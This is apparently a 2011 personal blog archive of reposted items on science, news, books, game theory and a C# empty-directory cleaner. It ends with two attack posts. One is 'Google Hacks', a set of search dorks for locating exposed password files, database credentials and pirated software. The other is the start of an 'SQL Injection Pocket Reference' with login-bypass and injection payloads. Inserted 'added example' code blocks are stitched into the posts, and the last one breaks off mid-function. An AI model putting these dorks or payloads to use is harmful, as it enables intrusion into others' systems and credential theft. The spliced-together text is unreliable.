I want one!
Thursday, October 20, 2011
Friday, October 14, 2011
The International Aquatic Plants Layout Contest 2009
A friend of mine is into this hobby, aquatic plantscapes. A heavy emphasis is placed on the ecosystem and artistic design elements. There are some really cool tank setups on this page.
Tuesday, October 4, 2011
The 2011 Nobel Prize in Physics - Surprise!
Written in the stars
"Some say the world will end in fire, some say in ice..." *
What will be the final destiny of the Universe? Probably it will end in ice, if we are to believe this year's Nobel Laureates in Physics. They have studied several dozen exploding stars, called supernovae, and discovered that the Universe is expanding at an ever-accelerating rate. The discovery came as a complete surprise even to the Laureates themselves.
In 1998, cosmology was shaken at its foundations as two research teams presented their findings. Headed by Saul Perlmutter, one of the teams had set to work in 1988. Brian Schmidt headed another team, launched at the end of 1994, where Adam Riess was to play a crucial role.
The research teams raced to map the Universe by locating the most distant supernovae. More sophisticated telescopes on the ground and in space, as well as more powerful computers and new digital imaging sensors (CCD, Nobel Prize in Physics in 2009), opened the possibility in the 1990s to add more pieces to the cosmological puzzle.
The teams used a particular kind of supernova, called type Ia supernova. It is an explosion of an old compact star that is as heavy as the Sun but as small as the Earth. A single such supernova can emit as much light as a whole galaxy. All in all, the two research teams found over 50 distant supernovae whose light was weaker than expected - this was a sign that the expansion of the Universe was accelerating. The potential pitfalls had been numerous, and the scientists found reassurance in the fact that both groups had reached the same astonishing conclusion.
For almost a century, the Universe has been known to be expanding as a consequence of the Big Bang about 14 billion years ago. However, the discovery that this expansion is accelerating is astounding. If the expansion will continue to speed up the Universe will end in ice.
The acceleration is thought to be driven by dark energy, but what that dark energy is remains an enigma - perhaps the greatest in physics today. What is known is that dark energy constitutes about three quarters of the Universe. Therefore the findings of the 2011 Nobel Laureates in Physics have helped to unveil a Universe that to a large extent is unknown to science. And everything is possible again.
An amazing discovery was made by the 2011 Nobel Prize winner in Physics. During an effort to measure the rate of expansion of the universe (caused by the Big Bang), scientists were shocked to discover that the rate of expansion is actually increasing. Scientists are baffled. Some postulate that energy from dark matter is the force causing the increase.
I think God is smiling as he watches us scratch our heads. How can the rate of expansion resulting from one cosmic explosion (Big Bang) be getting faster? Our current understanding of Physics tells us it should be slowing down. Common sense tells us the same. I love it when science reveals another mystery about our universe that supports, not contradicts, belief in God.
Monday, October 3, 2011
Amanda Knox verdict: Freed as appeal court overturns murder conviction
KEY DATES IN THE CONVICTION OF AMANDA KNOX
Nov 2, 2007: Body of Meredith Kercher is found in Perugia apartment. Investigators say she was killed the night before.
Nov 6, 2007: Knox is arrested with then-boyfriend Raffaele Sollecito, and Diya 'Patrick' Lumumba, Congolese owner of pub where Knox occasionally worked.
Nov 20, 2007: Lumumba, implicated by Knox statements to police, is released from jail for lack of evidence.
Dec 6, 2007: Ivory Coast national Rudy Hermann Guede is extradited from Germany, where he was arrested, and jailed upon arrival in Italy.
Dec 14, 2007: Meredith is laid to rest after funeral in London.
Oct 28, 2008: Judge indicts Knox and Sollecito on murder and sexual assault charges. Guede, who was granted a fast-track trial, is convicted of murder and sexual assault and sentenced to 30 years in prison.
Jan 16, 2009: Trial of Knox and Sollecito opens in Perugia.
Jun 12, 2009: Knox takes stand; tells court she was shocked by Meredith's death, offers alibi and says police beat her into making false statements.
Dec 4, 2009: Court finds Knox guilty of murder and sexual assault; sentences her to 26 years in prison. Sollecito is convicted of same charges and sentenced to 25 years.
Dec 22, 2009: Appeals court upholds Guede conviction and cuts sentence to 16 years.
Nov 8, 2010: Judge orders Knox to stand trial on slander charges for claiming police beating.
Nov 24, 2010: Appeals trial for Knox and Sollecito opens in Perugia.
Dec 16, 2010: Italy's highest criminal court upholds Guede's conviction and 16-year prison sentence.
June 29, 2011: Independent forensic report ordered by appeals court finds much of the DNA evidence used to convict Knox and Sollecito is unreliable.
October 3, 2011: Knox and Sollecito are freed after appeals court overturns conviction for murder.
Good timeline of Kercher murder and Knox 4-year drama. I followed this story the whole time and thought that she was innocent at the beginning. It just didn't add up. So when the verdict to overturn her conviction was reached today, I was watching it live and was actually holding my breath. I'm very glad for the outcome. Welcome home Amanda.
Knox Evidence Questions lead to Acquittal | Fox News
Over the course of the appeals trial, the defendants' positions have significantly improved, mainly because a court-ordered independent review cast serious doubts over the main DNA evidence linking the two to the crime.
Prosecutors maintain that Knox's DNA was found on the handle of a kitchen knife believed to be the murder weapon, and that Kercher's DNA was found on the blade. They said Sollecito's DNA was on the clasp of Kercher's bra as part of a mix of evidence that also included the victim's genetic profile.
But the independent review -- ordered at the request of the defense, which had always disputed those findings -- reached a different conclusion.
The two experts found that police conducting the investigation had made glaring errors in evidence-collecting and that below-standard testing and possible contamination raised doubts over the attribution of DNA traces, both on the blade and on the bra clasp, which was collected from the crime scene 46 days after the murder.
The review was crucial in the case because no motive has emerged and witness testimony was contradictory. It was a huge boost for the defense's hope and a potentially fatal blow for the prosecution.
The prosecutors, however, refute the review and stand by their original conclusions.
Knox Awaits Verdict After Pleading For Freedom In Italian Court | Fox News
I'm very glad for her. I thought she was innocent from the beginning of this 4 year nightmare.
Thursday, September 29, 2011
Amazon Silk | The official blog of the Amazon Silk team
Introducing Amazon Silk
September 28, 2011 by The Amazon Silk Team
Today in New York, Amazon introduced Silk, an all-new web browser powered by Amazon Web Services (AWS) and available exclusively on the just announced Kindle Fire. You might be asking, “A browser? Do we really need another one?” As you’ll see in the video below, Silk isn’t just another browser. We sought from the start to tap into the power and capabilities of the AWS infrastructure to overcome the limitations of typical mobile browsers. Instead of a device-siloed software application, Amazon Silk deploys a split-architecture. All of the browser subsystems are present on your Kindle Fire as well as on the AWS cloud computing platform. Each time you load a web page, Silk makes a dynamic decision about which of these subsystems will run locally and which will execute remotely. In short, Amazon Silk extends the boundaries of the browser, coupling the capabilities and interactivity of your local device with the massive computing power, memory, and network connectivity of our cloud.
We’ll have a lot more to say about Amazon Silk in the coming weeks and months, so please check back with us often. You can also follow us on Twitter at @AmazonSilk. Finally, if you’re interested in learning more about career opportunities on the Amazon Silk team, please visit our jobs page.
Monday, May 16, 2011
Science - Scientists find genetic link to depression
Scientists have for the first time confirmed a specific genetic link to depression, according to new evidence published in the American Journal of Psychiatry on Monday.
The discovery, made independently by research teams in the UK and US, is expected to lead to a better biological understanding of the condition and eventually to more effective antidepressants.
Friday, May 13, 2011
Dumb-Funny Jokes
Thursday, April 21, 2011
gladwell dot com - outliers
What is Outliers about?
1. What is an outlier?
"Outlier" is a scientific term to describe things or phenomena that lie outside normal experience. In the summer, in Paris, we expect most days to be somewhere between warm and very hot. But imagine if you had a day in the middle of August where the temperature fell below freezing. That day would be an outlier. And while we have a very good understanding of why summer days in Paris are warm or hot, we know a good deal less about why a summer day in Paris might be freezing cold. In this book I'm interested in people who are outliers—in men and women who, for one reason or another, are so accomplished and so extraordinary and so outside of ordinary experience that they are as puzzling to the rest of us as a cold day in August.
2. Why did you write Outliers?
I write books when I find myself returning again and again, in my mind, to the same themes. I wrote Tipping Point because I was fascinated by the sudden drop in crime in New York City—and that fascination grew to an interest in the whole idea of epidemics and epidemic processes. I wrote Blink because I began to get obsessed, in the same way, with the way that all of us seem to make up our minds about other people in an instant—without really doing any real thinking. In the case of Outliers, the book grew out of a frustration I found myself having with the way we explain the careers of really successful people. You know how you hear someone say of Bill Gates or some rock star or some other outlier—"they're really smart," or "they're really ambitious?" Well, I know lots of people who are really smart and really ambitious, and they aren't worth 60 billion dollars. It struck me that our understanding of success was really crude—and there was an opportunity to dig down and come up with a better set of explanations.
3. In what way are our explanations of success "crude?"
That's a bit of a puzzle because we certainly don't lack for interest in the subject. If you go to the bookstore, you can find a hundred success manuals, or biographies of famous people, or self-help books that promise to outline the six keys to great achievement. (Or is it seven?) So we should be pretty sophisticated on the topic. What I came to realize in writing Outliers, though, is that we've been far too focused on the individual—on describing the characteristics and habits and personality traits of those who get furthest ahead in the world. And that's the problem, because in order to understand the outlier I think you have to look around them—at their culture and community and family and generation. We've been looking at tall trees, and I think we should have been looking at the forest.
4. Can you give some examples?
Sure. For example, one of the chapters looks at the fact that a surprising number of the most powerful and successful corporate lawyers in New York City have almost the exact same biography: they are Jewish men, born in the Bronx or Brooklyn in the mid-1930's to immigrant parents who worked in the garment industry. Now, you can call that a coincidence. Or you can ask—as I do—what is it about being Jewish and being part of the generation born in the Depression and having parents who worked in the garment business that might have something to do with turning someone into a really, really successful lawyer? And the answer is that you can learn a huge amount about why someone reaches the top of that profession by asking those questions.
5. Doesn't that make it sound like success is something outside of an individual's control?
I don't mean to go that far. But I do think that we vastly underestimate the extent to which success happens because of things the individual has nothing to do with. Outliers opens, for example, by examining why a hugely disproportionate number of professional hockey and soccer players are born in January, February and March. I'm not going to spoil things for you by giving you the answer. But the point is that the very best hockey players are people who are talented and work hard but who also benefit from the weird and largely unexamined and peculiar ways in which their world is organized. I actually have a lot of fun with birthdates in Outliers. Did you know that there's a magic year to be born if you want to be a software entrepreneur? And another magic year to be born if you want to be really rich? In fact, one nine-year stretch turns out to have produced more Outliers than any other period in history. It's remarkable how many patterns you can find in the lives of successful people, when you look closely.
6. What's the most surprising pattern you uncovered in the book?
It's probably the chapter near the end of Outliers where I talk about plane crashes. How good a pilot is, it turns out, has a lot to do with where that pilot is from—that is, the culture he or she was raised in. I was actually stunned by how strong the connection is between culture and crashes, and it's something that I would never have dreamed was true, in a million years.
7. Wait. Does this mean that there are some airlines that I should avoid?
Yes. Although, as I point out in Outliers, by acknowledging the role that culture plays in piloting, some of the most unsafe airlines have actually begun to clean up their act.
8. In Tipping Point, you had an entire chapter on suicide. In Blink, you ended the book with a long chapter on the Diallo shooting—and now plane crashes. Do you have a macabre side?
Yes! I'm a frustrated thriller writer! But seriously, there's a good reason for that. I think that we learn more from extreme circumstances than anything else; disasters tell us something about the way we think and behave that we can't learn from ordinary life. That's the premise of Outliers. It's those who lie outside ordinary experience who have the most to teach us.
9. How does this book compare to Blink and The Tipping Point?
It's different, in the sense that it's much more focused on people and their stories. The subtitle—"The Story of Success"—is supposed to signal that. A lot of the book is an attempt to describe the lives of successful people, but to tell their stories in a different way than we're used to. I have a chapter that deals, in part, with explaining the extraordinary success of Bill Gates. But I'm not interested in anything that happened to him past the age of about 17. Or I have a chapter explaining why Asian schoolchildren are so good at math. But it's focused almost entirely on what the grandparents and great-grandparents and great-great grandparents of those schoolchildren did for a living. You'll meet more people in Outliers than in my previous two books.
10. What was your most memorable experience in researching Outliers?
There were so many! I'll never forget the time I spent with Chris Langan, who might be the smartest man in the world. I've never been able to feel someone's intellect before, the way I could with him. It was an intimidating experience, but also profoundly heartbreaking—as I hope becomes apparent in "The Trouble with Geniuses" chapter. I also went to south China and hung out in rice paddies, and went to this weird little town in eastern Pennsylvania where no one ever has a heart attack, and deciphered aircraft "black box" recorders with crash investigators. I should warn all potential readers that once you get interested in the world of plane crashes, it becomes very hard to tear yourself away. I'm still obsessed.
11. What do you want people to take away from Outliers?
I think this is the way in which Outliers is a lot like Blink and Tipping Point. They are all attempts to make us think about the world a little differently. The hope with Tipping Point was it would help the reader understand that real change was possible. With Blink, I wanted to get people to take the enormous power of their intuition seriously. My wish with Outliers is that it makes us understand how much of a group project success is. When outliers become outliers it is not just because of their own efforts. It's because of the contributions of lots of different people and lots of different circumstances—and that means that we, as a society, have more control about who succeeds—and how many of us succeed—than we think. That's an amazingly hopeful and uplifting idea.
12. I noticed that the book is dedicated to "Daisy." Who is she?
Daisy is my grandmother. She was a remarkable woman, who was responsible for my mother's success—for the fact that my mother was able to get out of the little rural village in Jamaica where she grew up, get a University education in England and ultimately meet and marry my father. The last chapter of Outliers is an attempt to understand how Daisy was able to make that happen—using all the lessons learned over the course of the book. I've never written something quite this personal before. I hope readers find her story as moving as I did.
Anybody read Malcolm Gladwell? Tipping Point, Blink and Outliers? I haven't, but after reading this I'm going to. Sounds extremely interesting.
The Great Silence: the Controversy Concerning Extraterrestrial Intelligent Life
Great read if you're into pondering ways to predict the likeliness of extraterrestrial life in our galaxy.
Hamiltonian path
In the mathematical field of graph theory, a Hamiltonian path (or traceable path) is a path in an undirected graph that visits each vertex exactly once. A Hamiltonian cycle (or Hamiltonian circuit) is a cycle in an undirected graph which visits each vertex exactly once and also returns to the starting vertex. Determining whether such paths and cycles exist in graphs is the Hamiltonian path problem which is NP-complete.
Hamiltonian paths and cycles are named after William Rowan Hamilton who invented the Icosian game, now also known as Hamilton's puzzle, which involves finding a Hamiltonian cycle in the edge graph of the dodecahedron. Hamilton solved this problem using the Icosian Calculus, an algebraic structure based on roots of unity with many similarities to the quaternions (also invented by Hamilton). This solution does not generalize to arbitrary graphs.
Wednesday, April 20, 2011
European collaboration breakthrough in developing graphene : News : News + Events : National Physical Laboratory
A collaborative research project has brought the world a step closer to producing a new material on which future nanotechnology could be based. Researchers across Europe, including NPL, have demonstrated how an incredible material, graphene, could hold the key to the future of high-speed electronics, such as micro-chips and touchscreen technology.
Graphene, only one atom thick, climbs terraces on the surface of a silicon carbide substrate. This picture of a graphene device was taken with an atomic force microscope by NPL's Dr Olga Kazakova.
Graphene has long shown potential, but has previously only been produced on a very small scale, limiting how well it could be measured, understood and developed. A paper published in Nature Nanotechnology explains how researchers have, for the first time, produced graphene to a size and quality where it can be practically developed and successfully measured its electrical characteristics. These significant breakthroughs overcome two of the biggest barriers to scaling up the technology.
A technology for the future
Graphene is a relatively new form of carbon made up of a single layer of atoms arranged in a honeycomb shaped lattice. Despite being one atom thick and chemically simple, graphene is extremely strong and highly conductive, making it ideal for high-speed electronics, photonics and beyond.
Graphene is a strong candidate to replace semiconductor chips. Moore's Law observes that the density of transistors on an integrated circuit doubles every two years, but silicon and other existing transistor materials are thought to be close to the minimum size where they can remain effective. Graphene transistors can potentially run at faster speeds and cope with higher temperatures. Graphene could be the solution to ensuring computing technology continues to grow in power whilst shrinking in size, extending the life of Moore's law by many years.
Large microchip manufacturers, such as IBM and Intel, have openly expressed interest in the potential of graphene as a material on which future computing could be based.
Graphene also has potential for exciting new innovations such as touchscreen technology, LCD displays and solar cells. Its unparalleled strength and transparency make it perfect for these applications, and its conductivity would offer a dramatic increase in efficiency on existing materials.
Growing to a usable size while maintaining quality
Until now, graphene of sufficient quality has only been produced in the form of small flakes of tiny fractions of a millimeter, using painstaking methods such as peeling layers off graphite crystals with sticky tape. Producing useable electronics requires much larger areas of material to be grown. This project saw researchers, for the first time, produce and successfully operate a large number of electronic devices from a sizable area of graphene layers (approximately 50 mm²).
The graphene sample was produced epitaxially - a process of growing one crystal layer on another - on silicon carbide. Having such a significant sample not only proves that it can be done in a practical, scalable way, but also allows the scientists to better understand important properties.
Measuring resistance
The second key breakthrough of the project was measuring graphene's electrical characteristics with unprecedented precision, paving the way for convenient and accurate standards to be established. For products such as transistors in computers to work effectively and be commercially viable, manufacturers must be able to make such measurements with incredible accuracy against an agreed international standard.
The international standard for electrical resistance is provided by the quantum Hall effect, a phenomenon whereby electrical properties in 2D materials can be determined based only on fundamental constants of nature. The effect has, until now, only been demonstrated with sufficient precision in a small number of conventional semiconductors. Furthermore, such measurements need temperatures close to absolute zero, combined with very strong magnetic fields, and only a few specialised laboratories in the world can achieve these conditions.
Graphene was long tipped to provide an even better standard, but samples were inadequate to prove this. By producing samples of sufficient size and quality, and accurately demonstrating Hall resistance, the team proved that graphene has the potential to supersede conventional semiconductors on a mass scale.
Furthermore, graphene shows the quantum Hall effect at much higher temperatures. This means the graphene resistance standard could be used much more widely as more labs can achieve the conditions required for its use. In addition to its advantages of operating speed and durability, this would also speed the production and reduce costs of future electronics technology based on graphene.
NPL's Professor Alexander Tzalenchuk, and the lead author on the Nature Nanotechnology paper, observes:
"It is truly sensational that a large area of epitaxial graphene demonstrated not only structural continuity, but also the degree of perfection required for precise electrical measurements on par with conventional semiconductors with a much longer development history."
Where now?
The research team are hoping to go on to demonstrate even more precise measurement, as well as accurate measurement at even higher temperatures. They are currently seeking EU funding to drive this forward.
Dr JT Janssen, an NPL Fellow who worked on the project, said:
"We’ve laid the groundwork for the future of graphene production, and will strive in our ongoing research to provide greater understanding of this exciting material. The challenge for industry in the coming years will be to scale the material up in a practical way to meet new technology demands. We have taken a huge step forward, and once the manufacturing processes are in place, we hope graphene will offer the world a faster and cheaper alternative to conventional semiconductors."
The research was a joint project carried out by the National Physical Laboratory (UK), Chalmers University of Technology (Göteborg, Sweden), Politecnico di Milano (Italy), Linköping University (Sweden) and Lancaster University (UK).
Published: 19 Jan 2010
Riemann Zeta Function -- from Wolfram MathWorld
The Riemann zeta function is an extremely important special function of mathematics and physics that arises in definite integration and is intimately related with very deep results surrounding the prime number theorem. While many of the properties of this function have been investigated, there remain important fundamental conjectures (most notably the Riemann hypothesis) that remain unproved to this day. The Riemann zeta function zeta(s) is defined over the complex plane for one complex variable, which is conventionally denoted s (instead of the usual z) in deference to the notation used by Riemann in his 1859 paper that founded the study of this function (Riemann 1859). It is implemented in Mathematica as Zeta[s].
Riemann was THE MAN
Prisoner's dilemma
The prisoner's dilemma is a fundamental problem in game theory that demonstrates why two people might not cooperate even if it is in both their best interests to do so. It was originally framed by Merrill Flood and Melvin Dresher working at RAND in 1950. Albert W. Tucker formalized the game with prison sentence payoffs and gave it the "prisoner's dilemma" name (Poundstone, 1992).
A classic example of the prisoner's dilemma (PD) is presented as follows:
- Two suspects are arrested by the police. The police have insufficient evidence for a conviction, and, having separated the prisoners, visit each of them to offer the same deal. If one testifies for the prosecution against the other (defects) and the other remains silent (cooperates), the defector goes free and the silent accomplice receives the full 10-year sentence. If both remain silent, both prisoners are sentenced to only six months in jail for a minor charge. If each betrays the other, each receives a five-year sentence. Each prisoner must choose to betray the other or to remain silent. Each one is assured that the other would not know about the betrayal before the end of the investigation. How should the prisoners act?
If we assume that each player cares only about minimizing his or her own time in jail, then the prisoner's dilemma forms a non-zero-sum game in which two players may each either cooperate with or defect from (betray) the other player. In this game, as in most game theory, the only concern of each individual player (prisoner) is maximizing his or her own payoff, without any concern for the other player's payoff. The unique equilibrium for this game is a Pareto-suboptimal solution, that is, rational choice leads the two players to both play defect, even though each player's individual reward would be greater if they both played cooperatively.
In the classic form of this game, cooperating is strictly dominated by defecting, so that the only possible equilibrium for the game is for all players to defect. No matter what the other player does, one player will always gain a greater payoff by playing defect. Since in any situation playing defect is more beneficial than cooperating, all rational players will play defect, all things being equal.
In the iterated prisoner's dilemma, the game is played repeatedly. Thus each player has an opportunity to punish the other player for previous non-cooperative play. If the number of steps is known by both players in advance, economic theory says that the two players should defect again and again, no matter how many times the game is played. However, this analysis fails to predict the behavior of human players in a real iterated prisoner's dilemma situation, and it also fails to predict the optimum algorithm when computer programs play in a tournament. Only when the players play an indefinite or random number of times can cooperation be an equilibrium, technically a subgame perfect equilibrium, meaning that both players defecting always remains an equilibrium and there are many other equilibrium outcomes. In this case, the incentive to defect can be overcome by the threat of punishment.
In casual usage, the label "prisoner's dilemma" may be applied to situations not strictly matching the formal criteria of the classic or iterative games, for instance, those in which two entities could gain important benefits from cooperating or suffer from the failure to do so, but find it merely difficult or expensive, not necessarily impossible, to coordinate their activities to achieve cooperation.
I found this to be fascinating. Yes, I'm a total geek.
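Added example (not part of the quoted article or of the original post): the payoff reasoning above, worked through in Python with the sentences from the two-suspects example (0, 0.5, 5 and 10 years). It goes one step beyond the one-shot game and also plays the iterated version; the tit-for-tat and always-defect strategies are illustrative assumptions, not something the text names.

```python
from itertools import product

C, D = "cooperate", "defect"   # cooperate = stay silent, defect = testify
MOVES = (C, D)

# Years in jail as (player 0, player 1), taken from the two-suspects example.
YEARS = {
    (C, C): (0.5, 0.5),    # both silent: six months each
    (C, D): (10.0, 0.0),   # silent accomplice gets 10 years, defector goes free
    (D, C): (0.0, 10.0),
    (D, D): (5.0, 5.0),    # each betrays the other: five years each
}


def years(player, mine, theirs):
    """Jail time for `player` (0 or 1) who plays `mine` while the other plays `theirs`."""
    profile = (mine, theirs) if player == 0 else (theirs, mine)
    return YEARS[profile][player]


def strictly_dominant(player):
    """Move that yields strictly less jail time than every alternative, whatever the other does."""
    for m in MOVES:
        alternatives = [o for o in MOVES if o != m]
        if all(years(player, m, t) < years(player, o, t)
               for o in alternatives for t in MOVES):
            return m
    return None


def nash_equilibria():
    """Pure-strategy profiles where neither player can shorten their own sentence alone."""
    found = []
    for a, b in product(MOVES, MOVES):
        a_ok = all(years(0, a, b) <= years(0, x, b) for x in MOVES)
        b_ok = all(years(1, b, a) <= years(1, x, a) for x in MOVES)
        if a_ok and b_ok:
            found.append((a, b))
    return found


def pareto_dominated(profile):
    """True if another profile is no worse for both players and better for at least one."""
    here = YEARS[profile]
    for other, there in YEARS.items():
        if other == profile:
            continue
        no_worse = all(t <= h for t, h in zip(there, here))
        better = any(t < h for t, h in zip(there, here))
        if no_worse and better:
            return True
    return False


# --- Iterated game (strategies below are assumptions made for this example) ---

def tit_for_tat(own_history, other_history):
    """Cooperate first, then copy the other player's previous move (punishes defection)."""
    return C if not other_history else other_history[-1]


def always_defect(own_history, other_history):
    """The one-shot 'rational' choice repeated every round."""
    return D


def play(strategy_a, strategy_b, rounds):
    """Total years accumulated by each player over `rounds` repetitions."""
    hist_a, hist_b = [], []
    total_a = total_b = 0.0
    for _ in range(rounds):
        a = strategy_a(hist_a, hist_b)
        b = strategy_b(hist_b, hist_a)
        ya, yb = YEARS[(a, b)]
        total_a += ya
        total_b += yb
        hist_a.append(a)
        hist_b.append(b)
    return total_a, total_b


if __name__ == "__main__":
    print("dominant move:", strictly_dominant(0), strictly_dominant(1))
    print("equilibria:", nash_equilibria())
    print("(defect, defect) Pareto-dominated:", pareto_dominated((D, D)))
    print("tit-for-tat vs tit-for-tat, 10 rounds:", play(tit_for_tat, tit_for_tat, 10))
    print("tit-for-tat vs always-defect, 10 rounds:", play(tit_for_tat, always_defect, 10))
```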
German Tree Wows Visitors by Being Decorated With 9,800 Easter Eggs
AP
April 11: Luna Lutz visits a tree with 9,800 Easter eggs in the garden of pensioner couple Christa and Volker Kraft in Saalfeld, Germany.
SAALFELD, Germany -- Volker Kraft's apple sapling sported just 18 eggs when he first decorated it for Easter in 1965. Decades later, the sturdy tree is festooned with 9,800 eggs, artfully decorated with everything from sequins to sea shells.
Decking trees with hollowed-out, painted eggs for Easter is popular in Germany, but the 75-year-old retiree's annual creation has become something special. Last year, it drew more than 13,000 visitors.
Kraft needs two weeks and countless trips up and down his ladder to hang the eggs and the task has become a little heavier each year since he began the decorations in 1965.
"I wanted to decorate a tree with Easter eggs for my children," Kraft said.
Kraft started with plastic eggs. Each year, the project grew; he switched to real eggs and enlisted his three children's help in blowing out and painting them.
His daughter, Gabriela Rumrich, says she started painting "simple decorations like flowers" aged four and didn't stop until she was 40. She still remembers her parents' Easter passion fondly.
"I love my hometown, Saalfeld, and that's why I started to paint pictures of the city on to the eggs," she told Associated Press Television News. "First easy ones, then more difficult ones."
Some of Gabriela's creations have been retired from the tree and are now kept in glass cases, safe from the wind and birds.
But there are plenty of eye-catching designs in their place: eggs covered in Baltic Sea shells or in elaborate crochet work, or with elaborate patterns drilled in their shells.
Many are the work of Kraft's wife, Christa, 74, who spends long winter evenings preparing the show.
"I need about one to two hours to crochet one egg depending on the thickness of thread, but also on the amount of beads I use," she said.
Over the years, word of the Krafts' tree has spread well beyond Saalfeld, a pretty eastern town of some 27,000 people nestled in the Saale valley.
The eggs now draw visitors from across Germany. The Krafts have responded to demand by making extra eggs each year to sell as souvenirs for about $7.10 each.
But there are limits to Volker Kraft's ambitions.
He plans to add another 200 eggs next year, bringing his total to 10,000 — and then stop, if only because he's running out of room to store the mountain of boxes.
Friday, April 15, 2011
C# Traverse Directory Tree Recursive - Delete empty directories
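using System;
using System.IO;
using System.Linq;

namespace DeleteEmptyDirs
{
    internal class Program
    {
        private static void Main(string[] args)
        {
            // Refuse to run without exactly one existing directory argument.
            if (args.Length != 1 || !Directory.Exists(args[0]))
            {
                Console.Error.WriteLine("usage: DeleteEmptyDirs <directory>");
                return;
            }
            WalkDirectoryTree(new DirectoryInfo(args[0]));
        }

        // Post-order walk: children are visited first, so a directory that
        // becomes empty once its empty children are gone is deleted as well.
        private static void WalkDirectoryTree(DirectoryInfo root)
        {
            // Do not descend into junctions/symlinks: their targets may lie
            // outside the tree that was passed on the command line.
            if ((root.Attributes & FileAttributes.ReparsePoint) != 0)
                return;

            foreach (var dirInfo in root.GetDirectories())
                WalkDirectoryTree(dirInfo);

            if (IsDirectoryEmpty(root.FullName))
                root.Delete();
        }

        public static bool IsDirectoryEmpty(string path)
        {
            return !Directory.EnumerateFileSystemEntries(path).Any();
        }
    }
}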
Thursday, April 14, 2011
Google Hacks
Manipulate the Google engine by using it to locate mp3 files online as well as some free software, and more! Using Google and some finely crafted searches, we can find a lot of interesting information.
For example, we can find:
Passwords
Software / MP3′s
etc.
Presented below is just a sample of interesting searches that we can send to Google to obtain info. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.
Try a few of these searches:
intitle:”Index of” passwords modified
allinurl:auth_user_file.txt
“access denied for user” “using password”
“A syntax error has occurred” filetype:ihtml
allinurl: admin mdb
“ORA-00921: unexpected end of SQL command”
inurl:passlist.txt
“Index of /backup”
“Chatologica MetaSearch” “stack tracking:”
And these:
“parent directory ” /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory “Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
“parent directory ” Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that I am only changing the word after the parent directory; change it to what you want and you will get a lot of stuff.
METHOD 2
put this string in google search:
intitle:index.of mp3
You only need to add the name of the song/artist/singer. Example: intitle:index.of mp3 jackson
METHOD 3
put this string in google search:
inurl:microsoft filetype:iso
You can change the string to whatever you want, e.g. microsoft to adobe, iso to zip, etc.
“AutoCreate=TRUE password=*”
This searches the password for “Website Access Analyzer”, a Japanese software that creates web statistics. For those who can read Japanese, check out the author’s site at: coara.or.jp/~passy/
“http://*:*@www” domainname
This is a query to get inline passwords from search engines (not just Google); you must type in the query followed by the domain name without the .com or .net.
Another way is by just typing
“http://bob:bob@www”
“sets mode: +k”
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.
allinurl: admin mdb
Not all of these pages are administrator’s access databases containing usernames, passwords and other sensitive information, but many are!
allinurl:auth_user_file.txt
DCForum’s password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)
intitle:”Index of” config.php
This search brings up sites with “config.php” files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.
eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown discussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.
Friday, April 8, 2011
Thursday, April 7, 2011
Wednesday, April 6, 2011
SQL Injection Pocket Reference
Testing Version
MySQL-specific code
Retrieving DB usernames/passwords
Tables & Columns
- Finding out column #
- Retrieving Tables
- Retrieving Columns
- PROCEDURE ANALYSE()
- Retrieving Multiple Tables/Columns at once
- Find Tables from Column Name
- Find Column From Table Name
Avoiding the use of single/double quotations
String concatenation
Privileges
FILE privilege
Out Of Band Channeling
Reading Files (requires FILE privilege)
Writing Files (requires FILE privilege)
Stacked Queries with PDO
User Defined Functions
Fuzzing and Obfuscation
Operators
Constants
MySQL Functions()
MySQL Password Hashing (Taken from MySQL website)
MySQL Password() Cracker
MySQL < 4.1 Password Cracker
MSSQL
- Default Databases
- Comment Out Query
- Testing Version
- Retrieving user names/passwords
- Database Server Hostname
- Listing Databases
- Tables & Columns
OPENROWSET Attacks
System Command Execution
SP_PASSWORD (Hiding Query)
Stacked Queries
Fuzzing and Obfuscation
MSSQL Password Hashing
MSSQL Password Cracker
ORACLE
Tables & Columns
Fuzzing and Obfuscation
Out Of Band Channeling
Credits
I would like to thank .mario, Reiners and everyone else who helped me put this together. You can reach me at twitter.com/LightOS for any suggestions you may have or if there's something you think should be on here. Remember this is still a work in progress, so this doc will be updated frequently.
MySQL
Default Databases
- mysql (Privileged)
- information_schema (Version >= 5)
Comment Out Query
- #
- /*
- -- -
- ;%00
- `
Example:
- ' OR 1=1 -- -' ORDER BY id;
- ' UNION SELECT 1, 2, 3`
Note: The backtick can only be used to end a query when used as an alias.
Testing Injection
- False: The query is invalid (MySQL errors/missing content on website)
- True: The query is valid (Content is displayed as usual)
Strings
- ' - False
- '' - True
- " - False
- "" - True
- \ - False
- \\ - True
Numeric
- AND 0 - False
- AND 1 - True
- 2-1 - 1
- 3-2 - 1
In a login
- ' OR '1
- ' OR 1 -- -
- '='
- 'LIKE'
- '=0-- -
Example:
- SELECT * FROM Users WHERE username = 'Mike' AND password = ''=''
- " OR "" = "
- " OR 1 = 1 -- -
Example: SELECT * FROM Users WHERE username = 'Mike' AND password = 'anypassword' OR '' = ''
Note:
- You can use as many apostrophes/quotations as you want as long as they pair up
- SELECT * FROM Articles WHERE id = '121'''''''''''''' - This is valid
- It's also possible to continue the statement after the chain of quotes: SELECT '1'''''''"" UNION SELECT 2 # 1 and 2
- Quotes escape quotes: SELECT '1''' # 1'
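Why the login strings above work, and what stops them, as an added example that is not part of the original reference. It runs the page's quote tests and two of its login payloads against a concatenated query and a parameterized one; the in-memory SQLite table, the stored password and the function names are assumptions made for the demonstration (the page targets MySQL, where the same quoting rules apply to these inputs).

```python
import sqlite3

def make_db():
    """In-memory stand-in for the Users table from the examples (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (username TEXT, password TEXT)")
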